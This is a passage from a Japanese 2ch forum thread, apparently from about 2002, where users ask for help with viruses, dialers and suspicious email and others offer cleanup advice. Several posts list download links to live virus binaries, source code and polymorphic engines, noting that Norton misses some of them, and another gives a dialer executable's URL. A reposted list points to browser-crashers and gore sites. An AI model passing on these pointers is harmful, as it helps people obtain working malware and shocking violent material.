http://www.ebcvg.com/sections/binary/Win2k.TaiChi.zip (W2K.Lamchi)
Win32.Sharp
http://www.ebcvg.com/sections/binary/Win32.Sharp.zip (W32.HLLP.Sharpei@mm)
I-Worm.Grifin
http://www.ebcvg.com/sections/binary/I-Worm.Grifin.zip (W32.Grifout.Worm)
以上の2つはノートンは反応しません。
−−−−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php
0479471
NGNGこの時間までに28件も送られてきました。。
オイラ、誰かに恨まれてるのかなぁ。。(涙目)
0480>>479
NGNGhttp://www.jcsa.or.jp/
http://www.jcsa.or.jp/NoMoreHybr.html
メールが >>479 アドレスに来ている場合、次の原因が考えられる。
A.メールアドレスをWebページ上で公開している。
B.感染パソコンのユーザーとメールのやりとりがあった。
C.掲示板にメールアドレスを書き込んだ。
実際には、Aのパターンが圧倒的に多い。メールの送受信にかかる時間と
Webを閲覧する時間を比べれば、後者の方が何倍も多いからだ。
また、掲示板よりWebページ閲覧をする人数の方が多い。
Webページに対策を施すことによりAのパターンのHybrisメールを減らす、
またはなくすことができる。
なお、Cのパターンはとりあえずメールアドレスを書かない、
またはフリーメールアドレスを利用するという方法しかないだろう。
remove@mail.vertcoms.com
0481名無しさん@お腹いっぱい。
NGNG0482cheshire-cat
NGNG他のディスプレイ使っても?
0483名無しさん@お腹いっぱい。
NGNGそれだけじゃウィルスかどうかわからん。
0484名無しさん@お腹いっぱい。
NGNGhttp://www.securiteam.com/securitynews/5PP0P1P6AM.html
なんだってさ。
古い手だけど、結構やられると嫌だよね。
ところで、防ぎようあるのかな??
0485名無しさん@お腹いっぱい。
NGNGディスプレイのコードが抜けかけてる → しっかり差し込む
近所で工事中 → 終わるまで待つ
貧乏ゆすり → 直す
0486名無しさん@お腹いっぱい。
NGNG0487名無しさん@お腹いっぱい。
NGNG例えばzipは圧縮率がセントラルディレクトリに書かれているから、異常な奴は見分けられる。
0488481
NGNG大変ご迷惑おかけしました。コンセントディスプレイから離したら直りました。
アドバイスありがとうございました。
0489名無しさん@お腹いっぱい。
NGNGメールで、本文はHTML形式のようで、延々とJavaScriptで何やら記述されて
います。意味のありそうな、というか文章は入っていませんでした。
自分はMacなんで消しちゃえば関係ないのですが、念の為どのようなウイルス
か知っておきたいのです。
どなたかお判りになりますでしょうか?
0490826
NGNGネットするナトカなしで。
0491名無しさん@お腹いっぱい。
NGNG0492名無しさん@お腹いっぱい。
NGNG毎日クリーンインストール
0493名無しさん@お腹いっぱい。
NGNG外から帰ってきたら必ずうがいすること
0494
NGNG0495名無しさん@お腹いっぱい。
NGNG0496cheshire-cat
NGNG肌が硬くならないのかな。
柔肌好きだから、彼女にはしてもらいたくない。
でも見たら多分萌える。
0497名無しさん@お腹いっぱい。
NGNGUDをやってるのでつなぎっぱなしにしてますが、
自分が不在のときにBADTRANS.Bが検出されてました。
しかも発見されたファイルはc:\RECYCLED\DC32.TMPにあって
ゴミ箱を開いても発見されませんでした。とりあえず
ゴミ箱は空にして再度チェックしたらなくなったようですが
これで問題ないでしょうか?
ちなみにウィルスバスターで隔離されてるかもしれないです。
今トレンドマイクロの方にも試しに解析メール出してます。
0498名無しさん@お腹いっぱい。
NGNG自分のマシンを犠牲にしてまでUDすることないんじゃない?
0499名無しさん@お腹いっぱい。
NGNG当然、隠しファイルも表示する設定になってるんだよね?
それでもないなら平気なのかなあ…
0500名無しさん@お腹いっぱい。
NGNG隔離したからなくなっただけじゃないの?
とりあえず、隔離したのなら問題ないでしょ
0501497
NGNGファイルがひとつあるようです。
05033
NGNG0504名無しさん@お腹いっぱい。
NGNGウイルスコードを送りこんでおいて、Htmlでコードを実行させる
ってパターンかな??フルPATHの取得が難しそうだが…どうなんだろう?
それとも、既存のプログラムの機能をウイルスで利用するってことかな?
0505別スレより
NGNGBrocralist.txt
yahoo5briefcase.vr9.com/preteen/__tn___________kidsux.jpgeasyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
bbs.666host.com/ ウィルス
easyweb.easynet.co.uk/~hiros/ ウィルス
www.geocities.com/ccsacla/images0012.jpg ウィルス
zodiad.subnet.dk/image_002.jpg ウィルス
go5.163.com/sg9741/ ウィルス
www.ddanzi.com/ddanziilbo/bbs/cwb-data/data/FtvBBS/vavy.jpg グロ
vatican.rotten.com/infantiphagia/taboo2.html グロ
vagina.rotten.com/motorcycle/motorcycle.jpg グロ
village.infoweb.ne.jp/~angie/image/mist/movie/kill.mpeg グロ
www.trauma.softcoma.com/pictures/headless/15-kepa3.jpg グロ
www.stileproject.com/monkey_sugar.swf グロ
movies.ogrish.com/elevator.zip グロ
f1italia.monrif.net/08video/altrivideo/video1977.php3 グロ
www.trauma.softcoma.com/pictures/anenceph/index.htm グロ
ime.nu/www.eternal.rest.org.uk/58cy/flesh/3rd-ci53/b268-119.jpg グロ
myhome.hananet.net/~crazyghost/goto.htm 恐怖
voo.to/morninggazou 恐怖
www.popkmart.ne.jp/dl/tousatu.html 恐怖
homepage3.nifty.com/girls_and_boys~/ 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/hikaru04.zip 恐怖
www.geocities.co.jp/SiliconValley-Bay/4700/image01.gif 恐怖
www.mobilestation.tv/~feel/img/image01.gif 恐怖
r2.ugfree.to/~Sweet01/syasin.htm 恐怖
www.trebus.fsnet.co.uk/vir2/world/che-19aj/uiho.htm 虐殺
iran-e-azad.org/stoning/stoning-19.rm 虐殺
iran-e-azad.org/stoning/stoning-28.rm 虐殺
iran-e-azad.org/stoning/stoning-56m.rm 虐殺
iran-e-azad.org/stoning/stoning-56i.rm 虐殺
iran-e-azad.org/stoning/stoning-t1.rm 虐殺
cgi.members.interq.or.jp/hokkaido/asato/upload/jam3ddr/OB000153.jpg ブラクラ
www.adapo.net/upload/source/up0095.jpg ブラクラ
homepage2.nifty.com/superpage/opai.htm ブラクラ
isweb16.infoseek.co.jp/photo/tokioufo/hiroba.html ブラクラ
www.raus.de/crashme ブラクラ
www.southern-charms.com/pat/p8618.jpg 精神的ブラクラ
www.bayer-doyaku.com/roach/gerroa.jpg 精神的ブラクラ
www.mayhem.net/juke/bodiesbeat1.html 精神的ブラクラ
i.kebi.lycos.co.kr/~artkebi/whi.html 精神的ブラクラ
kitty-guys.hypermart.net/degawa.cgi 精神的ブラクラ
www.top.or.jp/~godhand/a2.html 精神的ブラクラ
members.tripod.co.jp/hama_ayu_poa/Daybreak.htm 精神的ブラクラ
www.dab.hi-ho.ne.jp/paramo/ 精神的ブラクラ
www.hpsozai.com/up/ap.cgi?get=2002212214830.jpg 精神的ブラクラ
bbsrent.vibe-station.com/uploader/img-box/img30.jpg 精神的ブラクラ
www.yaromat.com/macos8/index.htm ジョーク
mbspro5.uic.to/user/mikkixi.html ブラクラ
mitsuura.tripod.co.jp/offmeeting.jpg ブラクラ
www.hoops.ne.jp/~zaqro34/001MOVEBOX/index.html ブラクラ
www2.ocn.ne.jp/~ling/img/dog_p16.jpg グロ
home.kimo.com.tw/netspooky/kikia/kikia.swf 恐怖
www.eternal.rest.org.uk/58cy/30s/myh-cnb1/30s512.jpg グロ
0506cheshire-cat
NGNG精神的に。
0507名無しさん@お腹いっぱい。
NGNG感染させられました。オンラインウイルスチェック済みです。
対策ソフト持ってなくて・・・鬱。体験版もあらかた使い切ってしまった・・・。
そのウイルスサイトへのリンクを貼った人を法的に訴えることは可能でしょうか?
0508cheshire-cat
NGNGそれってジャバスクで別窓開く奴だっけ?
「どこにインストールされたのかわかりません」、みたいな。
どこにもDLされてないよ。
ソース見てみ、単なる悪戯サイト。
0509名無しさん@お腹いっぱい。
NGNGウイルス反応が出たのです。もうどうしたらいいのか・・・。
お金ないからソフト買えないし・・・。ともあれご進言ありがとうございます。
0510cheshire-cat
NGNGちょっと待て。
何が出た?どこに?
別サイトか?
オンラインチェックはウイルス定義ファイルが最新じゃない時があるから、これ。
ジャバスク使ってないとDLさせてくれないけど。
アンインストールに失敗することは無いから、Antidote簡易版を薦める。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/
0511名無しさん@お腹いっぱい。
NGNGありがたやありがたや・・・。
なんとお礼を申し上げてよいやら・・・。とりあえずそのソフト落として
みます!また事後報告に参りますね!
0512名無しさん@お腹いっぱい。
NGNG被害者は出ていないようです。それとも自分と同じく何も言えずに
いるのだろうか・・・。そのウイルスサイトへのリンクから大分
レスが結構付いているだけにとても不自然というか、不気味ですね・・・。
そのサイトのアドレスの一部に間違いなくgodhandとあります。
自分の下心が招いた悲しい結果だけに何ともやりきれません。
0513名無しさん@お腹いっぱい。
NGNGgohandにいっても、ウィルスチェックに引っかかる可能性は全く無いわけだ。
> いや、確かにオンラインウイルスチェックで一つだけでしたが
どこのオンラインチェックでなんと言うウィルスが検出されたんだ?
0514名無しさん@お腹いっぱい。
NGNGこのスレを最初からじっくりと読み直せ。
0515名無しさん@お腹いっぱい。
NGNGを念入りに2回かけて、もう一度トレンドマイクロのオンラインスキャンにかけてみたら
ウイルスは検出されませんでした!ほんとーーーーにありがとうございました。
おかげで助かりました。このご恩は忘れません。m(__)m
>>513 トレンドマイクロのオンラインスキャンを利用しました。検出された
ウイルスは取り乱してしまっててちょっと覚えてないんですけれど、数量は1、
ウイルスが検出されたとハッキリ表示されました。もうこれに懲りて怪しげな
サイトは踏みません。
どうもお世話になりました。ここっていい人多いんですね。それでは失礼します。
0516名無しさん@お腹いっぱい。
NGNG0517名無しさん@お腹いっぱい。
NGNG似たようなURL使って有害サイト立ち上げる
阿呆が出てくると思われ…
0518427
NGNGあれいらい、www.yahoo.comやwww.google.comのような有名どころにアクセスできなくなりました。
pingかけても全く反応なしです。
いろいろWEBをあさってみましたがさっぱり原因不明。もちろんウイスルなんていません。
やってきたグリーティングコムなるところを調べてもすでにもぬけの殻。
どうもどっかの会社が大量にアドレスを購入して再販しているものらしく、
いかにも詐欺の温床と言った使われ方したみたいで。
あああ、どうやったらみれるようになるのかな。
ちなみにIE6です。(これが一番の原因かな)
0519名無しさん@お腹いっぱい。
NGNGはやくクリーンインストールしろ
0520名無しさん@お腹いっぱい。
NGNG今日、ノートン先生が悲鳴をあげて死んだあと、目の前でデスクトップの
アイコンが半分くらいなくなった。DとEのFAT32ドライブがフォルダだけ
残して空っぽになった。
0521いらっしゃいませ
NGNGhttp://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り 3
http://tmp.2ch.net/test/read.cgi/download/1010071094/l50
0522名無しさん@お腹いっぱい。
NGNG頼むからクリーンインストールしてくれよ。お願いします。
0523名無しさん@お腹いっぱい。
NGNGttp://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
ttp://tokyo.cool.ne.jp/blackhat
0524もう、だめぽ
NGNGすべてクリーンインストールしなきゃ、だめぽ!
0525名無しさん@お腹いっぱい。
NGNGhttp://news.2ch.net/test/read.cgi/newsplus/1015048480/l50
これ何?
0526名無しさん@お腹いっぱい
NGNGに思って件名を検索したらW32/Klez-Eがそのような件名のメールを
送ることがあることが分かりました。
しかし、それ以前にこのメールには添付ファイルがついていませんで
した。
オンラインスキャンかけてもウイルスは見つからなかったので感染等
の問題はないのだとは思いますが、あまりにも謎なので…。
メール自体は空のHTMLメールで、123KBくらいあったと思います。
このメールは結局ウイルスではない、ということでよいのでしょうか?
ウイルスに関する知識が乏しいものでちょっと不安になってしまい質
問させて頂きました。
0527名無しさん@お腹いっぱい。
NGNGeditor-○○○@eros.stoen.net
みたいなメールがやたら来るんだけど・・・・どうすればいいかな?
0528名無しさん@お腹いっぱい。
NGNG削除
0529427
NGNGやっぱりそれしかねぇべか。
LANで繋がってる他のパソコン(マク)は問題ないからなぁ。
メンドクサイクリーンインスト、うかつにクリックした痛い代償じゃ。
0530名無しさん@お腹いっぱい。
NGNGうわ〜それうちにも来るよ・・(´Д`;)
SPAMだと思うんだけど名前まで書いてやがった(よく使う偽名ですが・・)
たぶん海外で登録したフリメから情報流されたんだろうなぁ・・
0531editor-○○○@eros.stoen.net
NGNG0532
NGNGおまえのパソコンがアブねえよ!
なんて書いてるし(w
0533名無しさん@お腹いっぱい。
NGNG何か起こっちゃいますか?>29で通報してあるとありましたが
もう大丈夫でしょうか?
0534名無しさん@お腹いっぱい。
NGNG0535名無しさん@お腹いっぱい。
NGNG無くなってるから関係ないよ
0536名無しさん@お腹いっぱい。
NGNGありがとう、安心しました。
0538名無しさん@お腹いっぱい。
NGNG今日スキャンしたらひっかかたんですけど。
0539名無しさん@お腹いっぱい。
NGNG0540名無しさん@お腹いっぱい。
NGNG誤爆
0541age
NGNGttp://tokyo.cool.ne.jp/blackhat
ここのウイルスはじめてみたんですけど。
カジノとかストーンとか、面白いですね。
あとピカチュウウイルスと2ちゃんねるウイルスを探しているんですが、
誰かご存知の方いますか?
どんな効果があるのか、ワームなのか詳しく教えてください。
0542cheshire-cat
NGNGこれか?
http://www.symantec.com/region/jp/sarcj/data/w/w32.pokey.worm.html
2chウイルスは、知らない。
0543名無しさん@お腹いっぱい。
NGNGいまさらながら・・だれか治し方をおしえてください。
0544名無しさん@お腹いっぱい。
NGNG0545未知のウイルス
NGNGhttp://vx.netlux.org/dat/vct.shtml
http://www.ebcvg.com/binary.php
未知のウイルス
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip
Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf
0546
NGNGこういう件名でメールが来たけど、これってやばい?
ちなみに添付つき。
0547名無しさん@お腹いっぱい。
NGNGチェックしてみりゃいいだろ
ソフト入れてない、なんて言うなよ
0548未知のウイルス
NGNGhttp://vx.netlux.org/dat/vct.shtml
http://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
未知のウイルス
VirusPack
http://skyscraper.fortunecity.com/laser/928/uirs_pak.lzh
Bloodhound.DirActCOM,File.String,HybridCOM
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip
Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf
0549Worm/Klez-E』が3月6日に発症
NGNGhttp://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20020306/4/
0550IE6のクッキーについて
NGNGクッキー書き込みエラーとなり次のページに進めない
との連絡を受けるようになりました。
その方のクッキー情報書き込みの制限を解除して貰っても
書き込みエラーが出るようで困ってしまっています。
同様の現象をお持ちの方いらっしゃいませんか?
0551名無しさん@お腹いっぱい。
NGNG0552名無しさん@お腹いっぱい。
NGNG0553名無しさん@お腹いっぱい。
NGNG0555cheshire-cat
NGNG2chウイルスって何?
2ch dukeのことかな。
あめぞうウイルスは持ってる(ウイルスじゃないけど)。
0556554
NGNG多分それじゃないかと思います。
なんか
www.media-0.com/www/mild/bakuhatsu.html
を最後まで進んでいくとダウンロードする画面までいくんですが、
そこでダウンロードしたらウイルスめいたものが来て困っています。
ウイルスかどうか猛者に鑑定して欲しいです。
0557cheshire-cat
NGNG2chDukeって、確か8つくらい出てたよね。
今はもう効かないかと。
0558名無しさん@お腹いっぱい。
NGNG間違いなく
www.media-0.com/www/mild/bakuhatsu.html
の先にあるものはウイルスといえる。
0559名無しさん@お腹いっぱい。
NGNGここでJABAを切ってる人をクリックする。
そしてダウンロードしたもの。
0560名無しさん@お腹いっぱい。
NGNGこれってウイルスですか?けしても
しばらくするとまた出てきます。
0561556 559
NGNGhttp://64.71.32.81/ERODIGITAL/erox.exe
です。
erox.exeというのがいかにもって感じで怪しいです。
誰か我こそはって方調査おながいします。
0562名無しさん@お腹いっぱい。
NGNGダイアルアップ先を国際通話に書き換える。
胴元は ttp://www.dtiserv.com/jp/index.html 見るならJSとActiveXはきっとけ。
こういう悪質な会社にも証明書を発行するVeriSign Commercial Software Publishers CA
なんて信用したくないという奴は
インターネットオプション→コンテンツ→証明書の信頼されたルート証明機関
からVeriSign Commercial Software Publishers CAを探し
表示→詳細設定→拡張キー使用法→プロパティの編集
でコード署名のチェックをはずしてしまえ。
www.erokichi.com/18over/ax.html?0 で証明書に問題ありが出れば成功。
0563名無しさん@お腹いっぱい。
NGNG最近だとあれだろ?
・・・そうそう、多分あれ。
関係無いけど「ドラゴンボール」って言うのも有るよ。
探してみ(w
ところで、全然関係無いけど、HTML+TIME2って何だっけ。。
0564556
NGNG親切なカキコありがとうございます。
やはり強制接続でしたか。
何度けしても消えないので精神ブラクラですね。
0565cheshire-cat
NGNG密かにメモします。
0566名無しさん@お腹いっぱい。
NGNGと言うウィルスに感染しました。
自分の探し方が悪いのかもしれませんが、
上記のウィルス、データベースに無いみたいなんです。
どのようなウィルスか判る方いらっしゃらないですか?
(XP IE6 ウィルスバスター2002)
0567566
NGNGトレンドマイクロ(英語サイト)で情報見つかりました。すんまそん。
英語が全く駄目なので、エキサイトで翻訳したのですが、
わかったのは、危険度・破壊力は低く、ActivXがどーのこーの・・・・
ってことだけでした(;´Д`)
ゴチャゴチャ書きましたが、とっとと削除しちゃっても構わないのでしょうか?
また、その後にやるべき事はあるのでしょうか?重ね重ねおながいします。
0568名無しさん@お腹いっぱい。
NGNGhttp://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html
http://www.nai.com/japan/virusinfo/virU.asp?v=Unsafe%20JS
0569名無しさん@お腹いっぱい。
NGNG0570566
NGNGリンク先を読んでウィルスを削除してから
スタートページとお気に入りとメール送受信でチェックしましたが
異常は見つかりませんでした。
と、手放しで喜んでるのもアレなんで
自分でももう少し調べてみようと思います。
ありがとうございます、ほんとに助かりました。
0571名無しさん@お腹いっぱい。
NGNG0572名無しさん@お腹いっぱい。
NGNG正直もう だめぽ
0573名無しさん@お腹いっぱい。
NGNG0574572
NGNGをインストールしたまま気づかなくて長時間時間2ちゃんばかりやってた。
0575名無しさん@お腹いっぱい。
NGNG知らないが、かたはしからダウンのところクリックしたんでないかえ?
>>574
人様に迷惑だけはかけるんじゃないよ。
0576名無しさん@お腹いっぱい。
NGNGhttp://pc.2ch.net/test/read.cgi/isp/1010717649/312-350 にも被害者いるね。
0578名無しさん@お腹いっぱい。
NGNGhttp://www.aa.wakwak.com/~dalk/q2log10.html
人様に迷惑はかけてないと思うよ。何万も請求が来るだけ。
0579578
NGNGご親切にどうもありがとうございました。
わたしはAirH"でNO!国際電話をインストールしていたんですが。
EROXソフト自体トロイのようなもので、そこから個人情報が漏れるということは
考えられますか?
0580_
NGNGそのファイルが削除出来ないのでNortonAntiVirusで検疫
したのですがこの後はどうすればいいのでしょう?
というか検疫ってどういった物なのでしょう?
0581名無しさん@お腹いっぱい。
NGNGダイヤルアップの項目が書き換えられているので戻すことを忘れずに。
Dailsoftとかbobonetがあれば削除。
その状態では国際電話に掛かってないと思われ。
>>580 NAVの「レポート」の「検疫項目」で「レポートを表示」で該当ファイルを
選択して削除する。「検疫」とは隔離みたいなもの。検疫場所に入ったファイル
(つまり検疫項目) はシステムの残りと相互作用しないので、感染ファイルであっ
てもウィルスは伝染しません。
0583579
NGNGそうですか。なら大丈夫です。すみません。
ありがとうございました。
0584名無しさん@お腹いっぱい。
NGNGDefault Block Backdoor/SubSeven Trojan
とかいうのが出てくるんですが、これはどういうものなんでしょう?
また、どこから攻撃されてるのかわかるものなんですかね?
0585名無しさん@お腹いっぱい。
NGNGノートンスレの1を見てこい。
0586cheshire-cat
NGNGコピペ
http://pc.2ch.net/test/read.cgi/hack/1014456049/497
http://pc.2ch.net/test/read.cgi/hack/1014456049/546
0587名無しさん@お腹いっぱい。
NGNGと言う警告をノートンが出したんですけど、平気なんでしょうか?
0588cheshire-cat
NGNGステルス=居ないふり→「ふーん、次いくか」
ブロック=居るけど防いじゃったよ→「よっしゃ、チャレンジ(笑)」
0589名無しさん@お腹いっぱい。
NGNG51 を変換しようとしたら ヲタ、
いたって を変換しようとしたら ヨガって
等になりました。
何者かに侵入され、辞書機能いじられてますか?
0590cheshire-cat
NGNGATOKかIMEか知らないけど、絶対ユーザー辞書いじられているかと。
ネット経由じゃなくて、知人が直接登録してやった悪戯かも。
漏れも、「きむら→本村」とか登録されて、かなり長い間気付かなかったことがある。
0591名無しさん@お腹いっぱい。
NGNGありがとうございました。
XPのFWって役に立たないんですね。
駆除ツール探してきます。
0592名無しさん@お腹いっぱい。
NGNG他人に操作されるのってセキュリティ尼杉
離籍するときスクリーンロックせんの?
0593cheshire-cat
NGNGXPのFWに言及したつもりは無いんだけど。
>>592
してるけど、既知外が来てるのに気付かずに油断した。
0594590
NGNGも一つ質問です。ATOKって何ですか?検索したら別の(赤い箱のソフト)
ヤツばっか出てくるんですが・・・。
0595名無しさん@お腹いっぱい。
NGNGレスありがとうございました。
ノートンはデフォルトの設定が甘いみたいなんで
色々いじくってたんですが、わからないことが多すぎる〜。
またわからない事があったらよろしくお願いしますね。
0596cheshire-cat
NGNG日本語入力するためのエンジンみたいなソフト。
MS OFFICEならIME入っているけど、一太郎ならATOK。
スレッド違いなんで、そろそろ止めませんか?
0597590
NGNGありがとうございました。
0598ところで
NGNGうちは職場に5通来ました。
0599cheshire-cat
NGNGKLEZ.Eの変種は4つほど集まったけど。
フォーマットしてくれなかった。
検出名はどれもKLEZ.Eだったんだけどね。
0600なるほど
NGNGじゃあ、うちに来たのも次の6日までファイルの書き換えは大丈夫なんて
たかをくくってはいられないですね。
なかなか周知の難しい職場なんで
時間かせぎだけが唯一の望みだったんだけど。
0601さっきびっくりしたひと。
NGNG添付つきで、送信者が、自分のメアドの@マーク前の部分と同じで、そのあとに、「-I」って
書いてあるんです。
で、件名欄には、「Re 」だけ。
ココロあたりないし、怖いから、削除したら、ウイルス削除したときとおんなじ反応があったんです。
これってば・・・やっぱりウイルスですか?
0602名無しさん@お腹いっぱい。
NGNGアウトルックエキスプレスを起動して、
メールを受信し始めたら、
モニターの電源が切れました。
ウイルスなのでしょうか?
(今はモニターの電源はついてます。)
0604名無しさん@お腹いっぱい。
NGNGハァ?
0605名無しさん@お腹いっぱい。
NGNGダサいよあんた。
0606ニムダ
NGNG07:14:06,受信 ,TCP ,61.203.200.61,2010 ,192.168.1.2 ,80 ,Nimda
a. [IPネットワークアドレス] 61.203.200.0
b. [ネットワーク名] UN-AN
f. [組織名] 有限会社アンクルアンティーク
g. [Organization] Un-cle An-tique LTD.
m. [運用責任者] MY1520JP
n. [技術連絡担当者] MB002JP
p. [ネームサーバ] dns.un-an.gr.jp
p. [ネームサーバ] dns1.ile-tec.co.jp
y. [通知アドレス] baba@docom.co.jp
[割当年月日] 2001/05/30
[返却年月日]
[最終更新] 2001/06/14 10:08:17 (JST)
baba@docom.co.jp
この上のメアドにメールしてもいいんですか?
それとも、放置が基本なのですか?
基本は放置だろうな
0608名無しさん@お腹いっぱい。
NGNGって言うウィルス名を聞いたんですが、誰かご存知のかたいらっしゃいますか?
検索かけても見つからなくて。
0609名無しさん@お腹いっぱい。
NGNG次から質問しないでください、おながいします
http://www.google.co.jp/search?q=pe_magistr.a&hl=ja&lr=
0610名無しさん@お腹いっぱい。
NGNG何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
0611名無しさん@お腹いっぱい。
NGNG送られてくるメールほとんどに添付ファイルがあるのです。
友人の携帯のメールからメーリングリストまで、
ほとんんどのメールについています。
RE●●とか空白のタイトルではないのでどのようなウィルスなのか
わかりません。
心あたりがある方、ぜひおしえてください。
既出でしたらすみません。
よろしくお願いいたします。
0612名無しさん@お腹いっぱい。
NGNG今見れないjpgとかmpgもう一回見られるようにするにはどうしたらいいのか…
やっぱアンチウィルス入れるべきなのか…
0613名無しさん@お腹いっぱい。
NGNG‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥○
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━
● WORM_GIBE.A(ギベ)
マイクロソフト社のセキュリティアップデートプログラムと偽る
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
○ウイルス名: WORM_GIBE.A
○危険度:低
○対応ウイルスパターンファイル:235 以降 ※1
○ウイルス活動:
メールの添付ファイルで広まります。メールの内容は次のとおりです。
0614名無しさん@お腹いっぱい。
NGNGあたりまえ
0615_
NGNGみたいな英文のメールがきた。(添付ファイル無し)
ウザイんで当然削除。
そして今日、WIN2000はお亡くなりに為りました。
(ノートンのautoprotectはかけてありましたが、無反応でした。)
一体何のウィルスだったのか情報希望
0616名無しさん@お腹いっぱい。
NGNG頼むからネタだと言ってクレ
0618名無しさん@お腹いっぱい。
NGNG0620名無しさん@お腹いっぱい。
NGNG0622助けて
NGNGウイルスを駆除しましたが、.xls と.jpgの拡張子を付いているファイルを
全部壊されました。EXCLEのファイルに大事なデータが入っていますので
回復できるかどうか、回復できるならその方法も教えて頂けませんか。
0623cheshire-cat
NGNGこういう事?
>拡張子が.txt、.htm、.html、.wab、.doc、.xls、.jpg、.cpp、.c、.pas、.mpg、.mpeg、.bak、.mp3のファイルを0で埋め尽くす
エクセルってツール→アドイン→自動保存を利用していると、編集中にテンポラルファイルみたいなのを作ってくれるよね。
Final Dataとか使ってさ、それをサルベージするとか。
0624助けて
NGNG詳しい説明を書いて頂けませんか。
0625cheshire-cat
NGNG1)自動保存を有効にしていたならば
デスクトップにエクセルのファイルを一つ置いて、それを開いて編集。
その時、半透明のファイルが出来る?全てのファイルを表示にしていると。
自動バックアップファイルなんだけど。エクセルを終了すると、勝手に消える。
これをデータ復旧ソフトのFinal Dataで拾う。
回収したファイルの拡張子を、xlsに変更。
2)FDやMOにそのファイルを移動させた事があるなら
もう削除していたとしても、そのメディアから、同様にFinal Dataで復旧できるかも。
クイックフォーマットしていても、回収できたりする。
「通常のフォーマット」だとまずいけど。
3)編集のため、一旦別の名前のコピーを作っていて、それを編集後に削除した経験があるなら。
Final Dataで拾う。
FinalDataとかは、削除してしまったファイルの復旧ツールです。
1-3に該当しないなら、上書き系なのであきらめるしかないかと。
FinalData
http://www.finaldata.ne.jp/
0626cheshire-cat
NGNGそういう状態のファイルまでは、KLEZに上書きされないかと。
それをサルベージするという話。
飲み会行ってくるんで、あとは自己解決してくださいな。
それでも駄目だと言うなら、お値段は高いけど。
http://www.nifty.com/eclinic/
0627別スレ351 ◆enghYAOw
NGNG今の段階ではあれから特に変わったことはありません。
まだウィルスが潜んでることは確かなのですが…
え〜っと、KLEZ_Eに感染して見れなくなった画像とか動画ファイルは>>622の言ってる
「壊された」って表現が正しいんですか?
てことは、感染する前に保存しておいたファイルはもう使えないってことですよね?
使えないなら削除するだけなんですが…
一応OSインストールしなおしてからDLしたファイルは見れるようになりました。
メールで質問すればよかったんですが、すいません。
0628名無しさん@お腹いっぱい。
NGNGアンチドートスーパーライトでスキャンしたらWin32.ZMistというものを検出。
ウイルスバスターでは検出できず。
http://www.symantec.co.jp/region/jp/sarcj/cgi-bin/virauto.cgi?vid=10598によると
.exeファイルに感染しているらしいのに、C:\Program Files\Fudeoh50\BIN\addrdic\PMLTDB32.DLLに感染の報告がされてる。
誤検出でいいのかな・・・・・・
0629(゚ρ゚)アウアー
NGNGうひゃ、、、Z0mbie・・・なの?
ttp://www.vnunet.com/News/1129775
↑ココに記事書いてある奴か??
多分そうだな。。
厄介だな。。。。。。。。
つか、、、ポリモエンジン自体、簡単に落せるし。。。
0630(゚ρ゚)アウアー
NGNG一応張っとく。
・・・・マカヒだとW32/Zmist.gen
0631名無しさん@お腹いっぱい。
NGNG(三井トラスト・ホールディングス株式会社の金融整理管財人への就任について)
本日、金融庁長官より、預金保険法第74条に基づく管理を命ずる処分を受け
た三井トラスト・ホールディングス株式会社の金融整理管財人として、金融
実務精通者としての法人たる預金保険機構、弁護士 ○○ ○○、公認会計
士 ○○ ○○の三者が選任された。
当機構としては、これまでの金融整理管財人としての経験等を生かし、他の
金融整理管財人ともよく協力して適切な業務運営に努めてまいりたい。
当機構から、三井トラスト・ホールディングス株式会社に派遣するスタッフは、金
融整理管財人代理 ○× ×○以下約30名である。
なお、三井トラスト・ホールディングス株式会社傘下の各行の預金等は全額保護さ
れており、善意かつ健全な借手への融資も継続する方針であり、利用者におかれて
は心配されることなく、冷静な対応をお願いしたい。
0632名無しさん@お腹いっぱい。
NGNGこれなに?
0633名無しさん@お腹いっぱい。
NGNG漏れも同じじゃ
で、アンチドートに分析たのんだよ
0634名無しさん@お腹いっぱい。
NGNG>>628
だっただよ
0635628
NGNG一応シマンテックのオンラインスキャンもやったけど検出されず。
こっちはトレンドマイクロに分析頼んでみるよ。
0636名無しさん@お腹いっぱい。
NGNGJUST SSYSTEMのフォルダにあった。
初めてのウイルス検出で焦って削除しちゃったよ・・・
